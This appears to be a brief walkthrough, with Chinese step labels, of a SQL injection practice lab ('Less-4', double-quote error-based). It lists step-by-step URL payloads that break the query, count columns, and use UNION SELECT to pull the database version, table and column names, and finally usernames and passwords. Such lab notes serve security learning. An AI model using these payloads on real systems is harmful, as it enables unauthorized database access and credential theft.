Less-4 GET - Error based -Double Quotes - String
1.原页面
2.?id=1
3.?id=1’
4.
‘ ‘’1\’’) LIMIT 0,1 ‘ --> ‘’1\’’) LIMIT 0,1
SQL:
Select login_name,password from admin where id =(“id”) limit 0,1
5.id=1“)–+
6.?id=1“) order by 3–+
7.查询数据库版本信息
?id=0”) union select 1,version(),3–+
8.查询数据库和用户名
?id=0”) union select 1,database(),user()–+
9.查询表名
?id=0”) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),user()–+
10.查询列名
?id=0”) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),3–
11.查询用户名和密码
?id=0”) union select 1,group_concat(username,0x3a,password),3 from users–+